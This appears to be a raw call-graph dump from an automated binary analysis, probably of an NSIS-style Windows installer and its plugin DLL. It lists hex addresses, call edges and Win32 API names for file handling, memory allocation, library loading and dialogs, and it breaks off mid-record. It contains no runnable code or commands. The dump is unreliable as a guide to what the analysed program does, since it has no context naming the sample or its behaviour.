4355 4034b2 4354->4355 4356 4059c5 2 API calls 4355->4356 4357 4034b8 4356->4357 4466 405f36 4357->4466 4470 405f07 GetFileAttributesW CreateFileW 4360->4470 4362 403055 4363 403065 4362->4363 4471 406411 lstrcpynW 4362->4471 4363->4288 4365 40307b 4366 405d32 2 API calls 4365->4366 4367 403081 4366->4367 4472 406411 lstrcpynW 4367->4472 4369 40308c GetFileSize 4370 4030a3 4369->4370 4385 403186 4369->4385 4370->4363 4372 403467 ReadFile 4370->4372 4376 4031f2 4370->4376 4384 402fb1 6 API calls 4370->4384 4370->4385 4372->4370 4373 40318f 4373->4363 4374 4031bf GlobalAlloc 4373->4374 4485 40347d SetFilePointer 4373->4485 4484 40347d SetFilePointer 4374->4484 4380 402fb1 6 API calls 4376->4380 4378 4031a8 4381 403467 ReadFile 4378->4381 4379 4031da 4382 40324c 31 API calls 4379->4382 4380->4363 4383 4031b3 4381->4383 4386 4031e6 4382->4386 4383->4363 4383->4374 4384->4370 4473 402fb1 4385->4473 4386->4363 4386->4386 4387 403223 SetFilePointer 4386->4387 4387->4363 4389 406806 5 API calls 4388->4389 4390 403af4 4389->4390 4391 403afa 4390->4391 4392 403b0c 4390->4392 4498 406358 wsprintfW 4391->4498 4393 4062df 3 API calls 4392->4393 4394 403b3c 4393->4394 4396 403b5b lstrcatW 4394->4396 4398 4062df 3 API calls 4394->4398 4397 403b0a 4396->4397 4490 403db6 4397->4490 4398->4396 4401 405dee 18 API calls 4402 403b8d 4401->4402 4403 403c21 4402->4403 4405 4062df 3 API calls 4402->4405 4404 405dee 18 API calls 4403->4404 4406 403c27 4404->4406 4407 403bbf 4405->4407 4408 403c37 LoadImageW 4406->4408 4409 40644e 17 API calls 4406->4409 4407->4403 4412 403be0 lstrlenW 4407->4412 4415 405d13 CharNextW 4407->4415 4410 403cdd 4408->4410 4411 403c5e RegisterClassW 4408->4411 4409->4408 4414 40140b 2 API calls 4410->4414 4413 403c94 SystemParametersInfoW CreateWindowExW 4411->4413 4443 403ce7 4411->4443 4416 403c14 4412->4416 4417 403bee lstrcmpiW 4412->4417 4413->4410 4418 403ce3 4414->4418 4419 403bdd 4415->4419 4421 405ce6 3 API calls 4416->4421 4417->4416 4420 403bfe GetFileAttributesW 4417->4420 4423 403db6 18 API calls 4418->4423 4418->4443 4419->4412 4422 403c0a 4420->4422 4424 403c1a 4421->4424 4422->4416 4425 405d32 2 API calls 4422->4425 4426 403cf4 4423->4426 4499 406411 lstrcpynW 4424->4499 4425->4416 4428 403d00 ShowWindow 4426->4428 4429 403d83 4426->4429 4430 406796 3 API calls 4428->4430 4500 40554c OleInitialize 4429->4500 4432 403d18 4430->4432 4434 403d26 GetClassInfoW 4432->4434 4437 406796 3 API calls 4432->4437 4433 403d89 4435 403da5 4433->4435 4436 403d8d 4433->4436 4439 403d50 DialogBoxParamW 4434->4439 4440 403d3a GetClassInfoW RegisterClassW 4434->4440 4438 40140b 2 API calls 4435->4438 4441 40140b 2 API calls 4436->4441 4436->4443 4437->4434 4438->4443 4442 40140b 2 API calls 4439->4442 4440->4439 4441->4443 4442->4443 4443->4290 4444->4294 4445->4326 4446->4295 4448 403a10 CloseHandle 4447->4448 4449 403a1e 4447->4449 4448->4449 4518 403a4b 4449->4518 4452 405b23 67 API calls 4453 403839 OleUninitialize 4452->4453 4453->4301 4453->4302 4456 405a8c 4454->4456 4455 405aa0 MessageBoxIndirectW 4457 403858 ExitProcess 4455->4457 4456->4455 4456->4457 4458->4334 4459->4345 4461 405a39 4460->4461 4462 405a2d CloseHandle 4460->4462 4461->4345 4462->4461 4464 401389 2 API calls 4463->4464 4465 401420 4464->4465 4465->4305 4467 405f43 GetTickCount GetTempFileNameW 4466->4467 4468 4034c3 4467->4468 4469 405f79 4467->4469 4468->4281 4469->4467 4469->4468 4470->4362 4471->4365 4472->4369 4474 402fd2 4473->4474 4475 402fba 4473->4475 4478 402fe2 GetTickCount 4474->4478 4479 402fda 4474->4479 4476 402fc3 DestroyWindow 4475->4476 4477 402fca 4475->4477 4476->4477 4477->4373 4481 402ff0 CreateDialogParamW ShowWindow 4478->4481 4482 403013 4478->4482 4486 406842 4479->4486 4481->4482 4482->4373 4484->4379 4485->4378 4487 40685f PeekMessageW 4486->4487 4488 406855 DispatchMessageW 4487->4488 4489 402fe0 4487->4489 4488->4487 4489->4373 4491 403dca 4490->4491 4507 406358 wsprintfW 4491->4507 4493 403e3b 4508 403e6f 4493->4508 4495 403b6b 4495->4401 4496 403e40 4496->4495 4497 40644e 17 API calls 4496->4497 4497->4496 4498->4397 4499->4403 4511 4043b3 4500->4511 4502 405596 4503 4043b3 SendMessageW 4502->4503 4504 4055a8 OleUninitialize 4503->4504 4504->4433 4505 40556f 4505->4502 4514 401389 4505->4514 4507->4493 4509 40644e 17 API calls 4508->4509 4510 403e7d SetWindowTextW 4509->4510 4510->4496 4512 4043cb 4511->4512 4513 4043bc SendMessageW 4511->4513 4512->4505 4513->4512 4516 401390 4514->4516 4515 4013fe 4515->4505 4516->4515 4517 4013cb MulDiv SendMessageW 4516->4517 4517->4516 4519 403a59 4518->4519 4520 403a23 4519->4520 4521 403a5e FreeLibrary GlobalFree 4519->4521 4520->4452 4521->4520 4521->4521 5057 6edf18d9 5058 6edf18fc 5057->5058 5059 6edf1943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5058->5059 5060 6edf1931 GlobalFree 5058->5060 5061 6edf1272 2 API calls 5059->5061 5060->5059 5062 6edf1ace GlobalFree GlobalFree 5061->5062 5063 402947 5064 402d3e 17 API calls 5063->5064 5065 402955 5064->5065 5066 40296b 5065->5066 5067 402d3e 17 API calls 5065->5067 5068 405ee2 2 API calls 5066->5068 5067->5066 5069 402971 5068->5069 5091 405f07 GetFileAttributesW CreateFileW 5069->5091 5071 40297e 5072 402a21 5071->5072 5073 40298a GlobalAlloc 5071->5073 5074 402a29 DeleteFileW 5072->5074 5075 402a3c 5072->5075 5076 4029a3 5073->5076 5077 402a18 CloseHandle 5073->5077 5074->5075 5092 40347d SetFilePointer 5076->5092 5077->5072 5079 4029a9 5080 403467 ReadFile 5079->5080 5081 4029b2 GlobalAlloc 5080->5081 5082 4029c2 5081->5082 5083 4029f6 5081->5083 5084 40324c 31 API calls 5082->5084 5085 405fb9 WriteFile 5083->5085 5090 4029cf 5084->5090 5086 402a02 GlobalFree 5085->5086 5087 40324c 31 API calls 5086->5087 5089 402a15 5087->5089 5088 4029ed GlobalFree 5088->5083 5089->5077 5090->5088 5091->5071 5092->5079 5093 6edf1058 5095 6edf1074 5093->5095 5094 6edf10dd 5095->5094 5096 6edf1092 5095->5096 5106 6edf1516 5095->5106 5098 6edf1516 GlobalFree 5096->5098 5099 6edf10a2 5098->5099 5100 6edf10a9 GlobalSize 5099->5100 5101 6edf10b2 5099->5101 5100->5101 5102 6edf10c7 5101->5102 5103 6edf10b6 GlobalAlloc 5101->5103 5105 6edf10d2 GlobalFree 5102->5105 5104 6edf153d 3 API calls 5103->5104 5104->5102 5105->5094 5108 6edf151c 5106->5108 5107 6edf1522 5107->5096 5108->5107 5109 6edf152e GlobalFree 5108->5109 5109->5096 5110 6edf16d4 5111 6edf1703 5110->5111 5112 6edf1b5f 22 API calls 5111->5112 5113 6edf170a 5112->5113 5114 6edf171d 5113->5114 5115 6edf1711 5113->5115 5117 6edf1727 5114->5117 5118 6edf1744 5114->5118 5116 6edf1272 2 API calls 5115->5116 5119 6edf171b 5116->5119 5120 6edf153d 3 API calls 5117->5120 5121 6edf176e 5118->5121 5122 6edf174a 5118->5122 5125 6edf172c 5120->5125 5124 6edf153d 3 API calls 5121->5124 5123 6edf15b4 3 API calls 5122->5123 5126 6edf174f 5123->5126 5124->5119 5127 6edf15b4 3 API calls 5125->5127 5128 6edf1272 2 API calls 5126->5128 5129 6edf1732 5127->5129 5130 6edf1755 GlobalFree 5128->5130 5131 6edf1272 2 API calls 5129->5131 5130->5119 5132 6edf1769 GlobalFree 5130->5132 5133 6edf1738 GlobalFree 5131->5133 5132->5119 5133->5119 5137 4016cc 5138 402d3e 17 API calls 5137->5138 5139 4016d2 GetFullPathNameW 5138->5139 5140 4016ec 5139->5140 5146 40170e 5139->5146 5143 40676f 2 API calls 5140->5143 5140->5146 5141 402bc2 5142 401723 GetShortPathNameW 5142->5141 5144 4016fe 5143->5144 5144->5146 5147 406411 lstrcpynW 5144->5147 5146->5141 5146->5142 5147->5146 5148 401e4e GetDC 5149 402d1c 17 API calls 5148->5149 5150 401e60 GetDeviceCaps MulDiv ReleaseDC 5149->5150 5151 402d1c 17 API calls 5150->5151 5152 401e91 5151->5152 5153 40644e 17 API calls 5152->5153 5154 401ece CreateFontIndirectW 5153->5154 5155 402630 5154->5155 5156 402acf 5157 402d1c 17 API calls 5156->5157 5158 402ad5 5157->5158 5159 402b12 5158->5159 5161 402925 5158->5161 5162 402ae7 5158->5162 5160 40644e 17 API calls 5159->5160 5159->5161 5160->5161 5162->5161 5164 406358 wsprintfW 5162->5164 5164->5161 4737 4020d0 4738 4020e2 4737->4738 4739 402194 4737->4739 4740 402d3e 17 API calls 4738->4740 4741 401423 24 API calls 4739->4741 4742 4020e9 4740->4742 4747 4022ee 4741->4747 4743 402d3e 17 API calls 4742->4743 4744 4020f2 4743->4744 4745 402108 LoadLibraryExW 4744->4745 4746 4020fa GetModuleHandleW 4744->4746 4745->4739 4748 402119 4745->4748 4746->4745 4746->4748 4760 406875 4748->4760 4751 402163 4755 405479 24 API calls 4751->4755 4752 40212a 4753 402132 4752->4753 4754 402149 4752->4754 4756 401423 24 API calls 4753->4756 4765 6edf1777 4754->4765 4757 40213a 4755->4757 4756->4757 4757->4747 4758 402186 FreeLibrary 4757->4758 4758->4747 4807 406433 WideCharToMultiByte 4760->4807 4762 406892 4763 406899 GetProcAddress 4762->4763 4764 402124 4762->4764 4763->4764 4764->4751 4764->4752 4766 6edf17aa 4765->4766 4808 6edf1b5f 4766->4808 4768 6edf17b1 4769 6edf18d6 4768->4769 4770 6edf17c9 4768->4770 4771 6edf17c2 4768->4771 4769->4757 4842 6edf23e0 4770->4842 4858 6edf239e 4771->4858 4776 6edf180f 4871 6edf25b5 4776->4871 4777 6edf182d 4782 6edf187e 4777->4782 4783 6edf1833 4777->4783 4778 6edf17df 4781 6edf17e5 4778->4781 4787 6edf17f0 4778->4787 4779 6edf17f8 4792 6edf17ee 4779->4792 4868 6edf2d83 4779->4868 4781->4792 4852 6edf2af8 4781->4852 4785 6edf25b5 10 API calls 4782->4785 4890 6edf15c6 4783->4890 4790 6edf186f 4785->4790 4786 6edf1815 4882 6edf15b4 4786->4882 4862 6edf2770 4787->4862 4798 6edf18c5 4790->4798 4896 6edf2578 4790->4896 4792->4776 4792->4777 4796 6edf17f6 4796->4792 4797 6edf25b5 10 API calls 4797->4790 4798->4769 4800 6edf18cf GlobalFree 4798->4800 4800->4769 4804 6edf18b1 4804->4798 4900 6edf153d wsprintfW 4804->4900 4805 6edf18aa FreeLibrary 4805->4804 4807->4762 4903 6edf121b GlobalAlloc 4808->4903 4810 6edf1b86 4904 6edf121b GlobalAlloc 4810->4904 4812 6edf1dcb GlobalFree GlobalFree GlobalFree 4813 6edf1de8 4812->4813 4826 6edf1e32 4812->4826 4815 6edf21de 4813->4815 4823 6edf1dfd 4813->4823 4813->4826 4814 6edf1c86 GlobalAlloc 4836 6edf1b91 4814->4836 4816 6edf2200 GetModuleHandleW 4815->4816 4815->4826 4819 6edf2226 4816->4819 4820 6edf2211 LoadLibraryW 4816->4820 4817 6edf1cd1 lstrcpyW 4822 6edf1cdb lstrcpyW 4817->4822 4818 6edf1cef GlobalFree 4818->4836 4911 6edf161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4819->4911 4820->4819 4820->4826 4822->4836 4823->4826 4907 6edf122c 4823->4907 4824 6edf2278 4824->4826 4828 6edf2285 lstrlenW 4824->4828 4825 6edf2086 4910 6edf121b GlobalAlloc 4825->4910 4826->4768 4912 6edf161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4828->4912 4830 6edf2238 4830->4824 4840 6edf2262 GetProcAddress 4830->4840 4832 6edf1fc7 GlobalFree 4832->4836 4833 6edf210e 4833->4826 4839 6edf2176 lstrcpyW 4833->4839 4834 6edf1d2d 4834->4836 4905 6edf158f GlobalSize GlobalAlloc 4834->4905 4835 6edf229f 4835->4826 4836->4812 4836->4814 4836->4817 4836->4818 4836->4822 4836->4825 4836->4826 4836->4832 4836->4833 4836->4834 4837 6edf122c 2 API calls 4836->4837 4837->4836 4839->4826 4840->4824 4841 6edf208f 4841->4768 4849 6edf23f8 4842->4849 4844 6edf2521 GlobalFree 4847 6edf17cf 4844->4847 4844->4849 4845 6edf24cb GlobalAlloc CLSIDFromString 4845->4844 4846 6edf24a0 GlobalAlloc WideCharToMultiByte 4846->4844 4847->4778 4847->4779 4847->4792 4848 6edf122c GlobalAlloc lstrcpynW 4848->4849 4849->4844 4849->4845 4849->4846 4849->4848 4851 6edf24ea 4849->4851 4914 6edf12ba 4849->4914 4851->4844 4918 6edf2704 4851->4918 4854 6edf2b0a 4852->4854 4853 6edf2baf CreateFileA 4857 6edf2bcd 4853->4857 4854->4853 4856 6edf2c99 4856->4792 4921 6edf2aa2 4857->4921 4859 6edf23b3 4858->4859 4860 6edf23be GlobalAlloc 4859->4860 4861 6edf17c8 4859->4861 4860->4859 4861->4770 4866 6edf27a0 4862->4866 4863 6edf284e 4865 6edf2854 GlobalSize 4863->4865 4867 6edf285e 4863->4867 4864 6edf283b GlobalAlloc 4864->4867 4865->4867 4866->4863 4866->4864 4867->4796 4870 6edf2d8e 4868->4870 4869 6edf2dce GlobalFree 4870->4869 4925 6edf121b GlobalAlloc 4871->4925 4873 6edf266b lstrcpynW 4879 6edf25bf 4873->4879 4874 6edf265a StringFromGUID2 4874->4879 4875 6edf2638 MultiByteToWideChar 4875->4879 4876 6edf267e wsprintfW 4876->4879 4877 6edf26a2 GlobalFree 4877->4879 4878 6edf26d7 GlobalFree 4878->4786 4879->4873 4879->4874 4879->4875 4879->4876 4879->4877 4879->4878 4880 6edf1272 2 API calls 4879->4880 4926 6edf12e1 4879->4926 4880->4879 4930 6edf121b GlobalAlloc 4882->4930 4884 6edf15b9 4885 6edf15c6 2 API calls 4884->4885 4886 6edf15c3 4885->4886 4887 6edf1272 4886->4887 4888 6edf127b GlobalAlloc lstrcpynW 4887->4888 4889 6edf12b5 GlobalFree 4887->4889 4888->4889 4889->4790 4892 6edf15d2 wsprintfW 4890->4892 4894 6edf15ff lstrcpyW 4890->4894 4895 6edf1618 4892->4895 4894->4895 4895->4797 4897 6edf2586 4896->4897 4898 6edf1891 4896->4898 4897->4898 4899 6edf25a2 GlobalFree 4897->4899 4898->4804 4898->4805 4899->4897 4901 6edf1272 2 API calls 4900->4901 4902 6edf155e 4901->4902 4902->4798 4903->4810 4904->4836 4906 6edf15ad 4905->4906 4906->4834 4913 6edf121b GlobalAlloc 4907->4913 4909 6edf123b lstrcpynW 4909->4826 4910->4841 4911->4830 4912->4835 4913->4909 4915 6edf12c1 4914->4915 4916 6edf122c 2 API calls 4915->4916 4917 6edf12df 4916->4917 4917->4849 4919 6edf2768 4918->4919 4920 6edf2712 VirtualAlloc 4918->4920 4919->4851 4920->4919 4922 6edf2aad 4921->4922 4923 6edf2abd 4922->4923 4924 6edf2ab2 GetLastError 4922->4924 4923->4856 4924->4923 4925->4879 4927 6edf130c 4926->4927 4928 6edf12ea 4926->4928 4927->4879 4928->4927 4929 6edf12f0 lstrcpyW 4928->4929 4929->4927 4930->4884 4931 404dd4 GetDlgItem GetDlgItem 4932 404e28 7 API calls 4931->4932 4935 405052 4931->4935 4933 404ed2 DeleteObject 4932->4933 4934 404ec5 SendMessageW 4932->4934 4936 404edd 4933->4936 4934->4933 4940 40511b 4935->4940 4946 4050b3 4935->4946 4949 40513a 4935->4949 4937 404eec 4936->4937 4938 404f14 4936->4938 4939 40644e 17 API calls 4937->4939 4941 404367 18 API calls 4938->4941 4943 404ef6 SendMessageW SendMessageW 4939->4943 4940->4949 4950 40512c SendMessageW 4940->4950 4947 404f28 4941->4947 4942 4051e3 4944 4051f8 4942->4944 4945 4051ec SendMessageW 4942->4945 4943->4936 4956 405211 4944->4956 4957 40520a ImageList_Destroy 4944->4957 4963 405221 4944->4963 4945->4944 4952 404d22 5 API calls 4946->4952 4953 404367 18 API calls 4947->4953 4948 4053d8 4951 4043ce 8 API calls 4948->4951 4949->4942 4949->4948 4954 405190 SendMessageW 4949->4954 4950->4949 4955 4053e6 4951->4955 4968 4050c4 4952->4968 4969 404f39 4953->4969 4954->4948 4959 4051a5 SendMessageW 4954->4959 4961 40521a GlobalFree 4956->4961 4956->4963 4957->4956 4958 40539a 4958->4948 4964 4053ac ShowWindow GetDlgItem ShowWindow 4958->4964 4960 4051b8 4959->4960 4971 4051c9 SendMessageW 4960->4971 4961->4963 4962 405014 GetWindowLongW SetWindowLongW 4965 40502d 4962->4965 4963->4958 4977 404da2 4 API calls 4963->4977 4982 40525c 4963->4982 4964->4948 4966 405032 ShowWindow 4965->4966 4967 40504a 4965->4967 4988 40439c SendMessageW 4966->4988 4989 40439c SendMessageW 4967->4989 4968->4940 4969->4962 4970 404f8c SendMessageW 4969->4970 4972 40500f 4969->4972 4975 404fca SendMessageW 4969->4975 4976 404fde SendMessageW 4969->4976 4970->4969 4971->4942 4972->4962 4972->4965 4975->4969 4976->4969 4977->4982 4978 405045 4978->4948 4979 405366 4980 405370 InvalidateRect 4979->4980 4984 40537c 4979->4984 4980->4984 4981 40528a SendMessageW 4983 4052a0 4981->4983 4982->4981 4982->4983 4983->4979 4985 405301 4983->4985 4987 405314 SendMessageW SendMessageW 4983->4987 4984->4958 4990 404cdd 4984->4990 4985->4987 4987->4983 4988->4978 4989->4935 4993 404c14 4990->4993 4992 404cf2 4992->4958 4994 404c2d 4993->4994 4995 40644e 17 API calls 4994->4995 4996 404c91 4995->4996 4997 40644e 17 API calls 4996->4997 4998 404c9c 4997->4998 4999 40644e 17 API calls 4998->4999 5000 404cb2 lstrlenW wsprintfW SetDlgItemTextW 4999->5000 5000->4992 5165 4028d5 5166 4028dd 5165->5166 5167 4028e1 FindNextFileW 5166->5167 5169 4028f3 5166->5169 5168 40293a 5167->5168 5167->5169 5171 406411 lstrcpynW 5168->5171 5171->5169 5172 401956 5173 402d3e 17 API calls 5172->5173 5174 40195d lstrlenW 5173->5174 5175 402630 5174->5175 5176 6edf2349 5177 6edf23b3 5176->5177 5178 6edf23be GlobalAlloc 5177->5178 5179 6edf23dd 5177->5179 5178->5177 5012 4014d7 5013 402d1c 17 API calls 5012->5013 5014 4014dd Sleep 5013->5014 5016 402bc2 5014->5016 5180 4044d7 lstrlenW 5181 4044f6 5180->5181 5182 4044f8 WideCharToMultiByte 5180->5182 5181->5182 5183 404858 5184 404884 5183->5184 5185 404895 5183->5185 5244 405a5b GetDlgItemTextW 5184->5244 5186 4048a1 GetDlgItem 5185->5186 5189 404900 5185->5189 5188 4048b5 5186->5188 5193 4048c9 SetWindowTextW 5188->5193 5196 405d91 4 API calls 5188->5196 5190 4049e4 5189->5190 5198 40644e 17 API calls 5189->5198 5242 404b93 5189->5242 5190->5242 5246 405a5b GetDlgItemTextW 5190->5246 5191 40488f 5192 4066c0 5 API calls 5191->5192 5192->5185 5197 404367 18 API calls 5193->5197 5195 4043ce 8 API calls 5200 404ba7 5195->5200 5201 4048bf 5196->5201 5202 4048e5 5197->5202 5203 404974 SHBrowseForFolderW 5198->5203 5199 404a14 5204 405dee 18 API calls 5199->5204 5201->5193 5208 405ce6 3 API calls 5201->5208 5205 404367 18 API calls 5202->5205 5203->5190 5206 40498c CoTaskMemFree 5203->5206 5207 404a1a 5204->5207 5209 4048f3 5205->5209 5210 405ce6 3 API calls 5206->5210 5247 406411 lstrcpynW 5207->5247 5208->5193 5245 40439c SendMessageW 5209->5245 5212 404999 5210->5212 5215 4049d0 SetDlgItemTextW 5212->5215 5219 40644e 17 API calls 5212->5219 5214 4048f9 5218 406806 5 API calls 5214->5218 5215->5190 5216 404a31 5217 406806 5 API calls 5216->5217 5225 404a38 5217->5225 5218->5189 5220 4049b8 lstrcmpiW 5219->5220 5220->5215 5222 4049c9 lstrcatW 5220->5222 5221 404a79 5248 406411 lstrcpynW 5221->5248 5222->5215 5224 404a80 5226 405d91 4 API calls 5224->5226 5225->5221 5230 405d32 2 API calls 5225->5230 5231 404ad1 5225->5231 5227 404a86 GetDiskFreeSpaceW 5226->5227 5229 404aaa MulDiv 5227->5229 5227->5231 5229->5231 5230->5225 5232 404b42 5231->5232 5234 404cdd 20 API calls 5231->5234 5233 404b65 5232->5233 5235 40140b 2 API calls 5232->5235 5249 404389 EnableWindow 5233->5249 5236 404b2f 5234->5236 5235->5233 5237 404b44 SetDlgItemTextW 5236->5237 5238 404b34 5236->5238 5237->5232 5240 404c14 20 API calls 5238->5240 5240->5232 5241 404b81 5241->5242 5250 4047b1 5241->5250 5242->5195 5244->5191 5245->5214 5246->5199 5247->5216 5248->5224 5249->5241 5251 4047c4 SendMessageW 5250->5251 5252 4047bf 5250->5252 5251->5242 5252->5251 5031 40175c 5032 402d3e 17 API calls 5031->5032 5033 401763 5032->5033 5034 405f36 2 API calls 5033->5034 5035 40176a 5034->5035 5036 405f36 2 API calls 5035->5036 5036->5035 5253 401d5d 5254 402d1c 17 API calls 5253->5254 5255 401d6e SetWindowLongW 5254->5255 5256 402bc2 5255->5256 5038 401ede 5039 402d1c 17 API calls 5038->5039 5040 401ee4 5039->5040 5041 402d1c 17 API calls 5040->5041 5042 401ef0 5041->5042 5043 401f07 EnableWindow 5042->5043 5044 401efc ShowWindow 5042->5044 5045 402bc2 5043->5045 5044->5045 5257 401563 5258 402b08 5257->5258 5261 406358 wsprintfW 5258->5261 5260 402b0d 5261->5260 5262 4026e4 5263 402d1c 17 API calls 5262->5263 5267 4026f3 5263->5267 5264 402830 5265 40273d ReadFile 5265->5264 5265->5267 5266 405f8a ReadFile 5266->5267 5267->5264 5267->5265 5267->5266 5268 402832 5267->5268 5269 40277d MultiByteToWideChar 5267->5269 5272 4027a3 SetFilePointer MultiByteToWideChar 5267->5272 5273 402843 5267->5273 5275 405fe8 SetFilePointer 5267->5275 5284 406358 wsprintfW 5268->5284 5269->5267 5272->5267 5273->5264 5274 402864 SetFilePointer 5273->5274 5274->5264 5276 406004 5275->5276 5279 40601c 5275->5279 5277 405f8a ReadFile 5276->5277 5278 406010 5277->5278 5278->5279 5280 406025 SetFilePointer 5278->5280 5281 40604d SetFilePointer 5278->5281 5279->5267 5280->5281 5282 406030 5280->5282 5281->5279 5283 405fb9 WriteFile 5282->5283 5283->5279 5284->5264 5285 401968 5286 402d1c 17 API calls 5285->5286 5287 40196f 5286->5287 5288 402d1c 17 API calls 5287->5288 5289 40197c 5288->5289 5290 402d3e 17 API calls 5289->5290 5291 401993 lstrlenW 5290->5291 5293 4019a4 5291->5293 5292 4019e5 5293->5292 5297 406411 lstrcpynW 5293->5297 5295 4019d5 5295->5292 5296 4019da lstrlenW 5295->5296 5296->5292 5297->5295 5298 40166a 5299 402d3e 17 API calls 5298->5299 5300 401670 5299->5300 5301 40676f 2 API calls 5300->5301 5302 401676 5301->5302 4563 4023ec 4564 402d3e 17 API calls 4563->4564 4565 4023fb 4564->4565 4566 402d3e 17 API calls 4565->4566 4567 402404 4566->4567 4568 402d3e 17 API calls 4567->4568 4569 40240e GetPrivateProfileStringW 4568->4569 4570 4053ed 4571 405411 4570->4571 4572 4053fd 4570->4572 4574 405419 IsWindowVisible 4571->4574 4581 405439 4571->4581 4573 405403 4572->4573 4583 40545a 4572->4583 4576 4043b3 SendMessageW 4573->4576 4577 405426 4574->4577 4574->4583 4575 40545f CallWindowProcW 4579 40540d 4575->4579 4576->4579 4584 404d22 SendMessageW 4577->4584 4581->4575 4589 404da2 4581->4589 4583->4575 4585 404d81 SendMessageW 4584->4585 4586 404d45 GetMessagePos ScreenToClient SendMessageW 4584->4586 4587 404d79 4585->4587 4586->4587 4588 404d7e 4586->4588 4587->4581 4588->4585 4598 406411 lstrcpynW 4589->4598 4591 404db5 4599 406358 wsprintfW 4591->4599 4593 404dbf 4594 40140b 2 API calls 4593->4594 4595 404dc8 4594->4595 4600 406411 lstrcpynW 4595->4600 4597 404dcf 4597->4583 4598->4591 4599->4593 4600->4597 4696 40176f 4697 402d3e 17 API calls 4696->4697 4698 401776 4697->4698 4699 401796 4698->4699 4700 40179e 4698->4700 4735 406411 lstrcpynW 4699->4735 4736 406411 lstrcpynW 4700->4736 4703 40179c 4707 4066c0 5 API calls 4703->4707 4704 4017a9 4705 405ce6 3 API calls 4704->4705 4706 4017af lstrcatW 4705->4706 4706->4703 4722 4017bb 4707->4722 4708 40676f 2 API calls 4708->4722 4709 405ee2 2 API calls 4709->4722 4711 4017cd CompareFileTime 4711->4722 4712 40188d 4713 405479 24 API calls 4712->4713 4714 401897 4713->4714 4717 40324c 31 API calls 4714->4717 4715 405479 24 API calls 4724 401879 4715->4724 4716 406411 lstrcpynW 4716->4722 4718 4018aa 4717->4718 4719 4018be SetFileTime 4718->4719 4721 4018d0 CloseHandle 4718->4721 4719->4721 4720 40644e 17 API calls 4720->4722 4723 4018e1 4721->4723 4721->4724 4722->4708 4722->4709 4722->4711 4722->4712 4722->4716 4722->4720 4729 405a77 MessageBoxIndirectW 4722->4729 4732 401864 4722->4732 4734 405f07 GetFileAttributesW CreateFileW 4722->4734 4725 4018e6 4723->4725 4726 4018f9 4723->4726 4727 40644e 17 API calls 4725->4727 4728 40644e 17 API calls 4726->4728 4730 4018ee lstrcatW 4727->4730 4731 401901 4728->4731 4729->4722 4730->4731 4731->4724 4733 405a77 MessageBoxIndirectW 4731->4733 4732->4715 4732->4724 4733->4724 4734->4722 4735->4703 4736->4704 5303 401a72 5304 402d1c 17 API calls 5303->5304 5305 401a7b 5304->5305 5306 402d1c 17 API calls 5305->5306 5307 401a20 5306->5307 5308 6edf166d 5309 6edf1516 GlobalFree 5308->5309 5312 6edf1685 5309->5312 5310 6edf16cb GlobalFree 5311 6edf16a0 5311->5310 5312->5310 5312->5311 5313 6edf16b7 VirtualFree 5312->5313 5313->5310 5314 401573 5315 401583 ShowWindow 5314->5315 5316 40158c 5314->5316 5315->5316 5317 40159a ShowWindow 5316->5317 5318 402bc2 5316->5318 5317->5318 5319 4014f5 SetForegroundWindow 5320 402bc2 5319->5320 5321 401ff6 5322 402d3e 17 API calls 5321->5322 5323 401ffd 5322->5323 5324 40676f 2 API calls 5323->5324 5325 402003 5324->5325 5327 402014 5325->5327 5328 406358 wsprintfW 5325->5328 5328->5327 5329 401b77 5330 402d3e 17 API calls 5329->5330 5331 401b7e 5330->5331 5332 402d1c 17 API calls 5331->5332 5333 401b87 wsprintfW 5332->5333 5334 402bc2 5333->5334 5335 4022f7 5336 402d3e 17 API calls 5335->5336 5337 4022fd 5336->5337 5338 402d3e 17 API calls 5337->5338 5339 402306 5338->5339 5340 402d3e 17 API calls 5339->5340 5341 40230f 5340->5341 5342 40676f 2 API calls 5341->5342 5343 402318 5342->5343 5344 402329 lstrlenW lstrlenW 5343->5344 5345 40231c 5343->5345 5347 405479 24 API calls 5344->5347 5346 405479 24 API calls 5345->5346 5349 402324 5345->5349 5346->5349 5348 402367 SHFileOperationW 5347->5348 5348->5345 5348->5349 5017 40167b 5018 402d3e 17 API calls 5017->5018 5019 401682 5018->5019 5020 402d3e 17 API calls 5019->5020 5021 40168b 5020->5021 5022 402d3e 17 API calls 5021->5022 5023 401694 MoveFileW 5022->5023 5024 4016a7 5023->5024 5030 4016a0 5023->5030 5026 40676f 2 API calls 5024->5026 5027 4022ee 5024->5027 5025 401423 24 API calls 5025->5027 5028 4016b6 5026->5028 5028->5027 5029 4061d7 36 API calls 5028->5029 5029->5030 5030->5025 5350 40237b 5351 402382 5350->5351 5352 402395 5350->5352 5353 40644e 17 API calls 5351->5353 5354 40238f 5353->5354 5354->5352 5355 405a77 MessageBoxIndirectW 5354->5355 5355->5352 5356 6edf10e1 5360 6edf1111 5356->5360 5357 6edf11d8 GlobalFree 5358 6edf12ba 2 API calls 5358->5360 5359 6edf11d3 5359->5357 5360->5357 5360->5358 5360->5359 5361 6edf1164 GlobalAlloc 5360->5361 5362 6edf11f8 GlobalFree 5360->5362 5363 6edf1272 2 API calls 5360->5363 5364 6edf12e1 lstrcpyW 5360->5364 5365 6edf11c4 GlobalFree 5360->5365 5361->5360 5362->5360 5363->5365 5364->5360 5365->5360 5366 4019ff 5367 402d3e 17 API calls 5366->5367 5368 401a06 5367->5368 5369 402d3e 17 API calls 5368->5369 5370 401a0f 5369->5370 5371 401a16 lstrcmpiW 5370->5371 5372 401a28 lstrcmpW 5370->5372 5373 401a1c 5371->5373 5372->5373 5374 401000 5375 401037 BeginPaint GetClientRect 5374->5375 5376 40100c DefWindowProcW 5374->5376 5378 4010f3 5375->5378 5379 401179 5376->5379 5380 401073 CreateBrushIndirect FillRect DeleteObject 5378->5380 5381 4010fc 5378->5381 5380->5378 5382 401102 CreateFontIndirectW 5381->5382 5383 401167 EndPaint 5381->5383 5382->5383 5384 401112 6 API calls 5382->5384 5383->5379 5384->5383 5385 401d81 5386 401d94 GetDlgItem 5385->5386 5387 401d87 5385->5387 5389 401d8e 5386->5389 5388 402d1c 17 API calls 5387->5388 5388->5389 5390 401dd5 GetClientRect LoadImageW SendMessageW 5389->5390 5392 402d3e 17 API calls 5389->5392 5393 401e33 5390->5393 5395 401e3f 5390->5395 5392->5390 5394 401e38 DeleteObject 5393->5394 5393->5395 5394->5395 4137 402902 4138 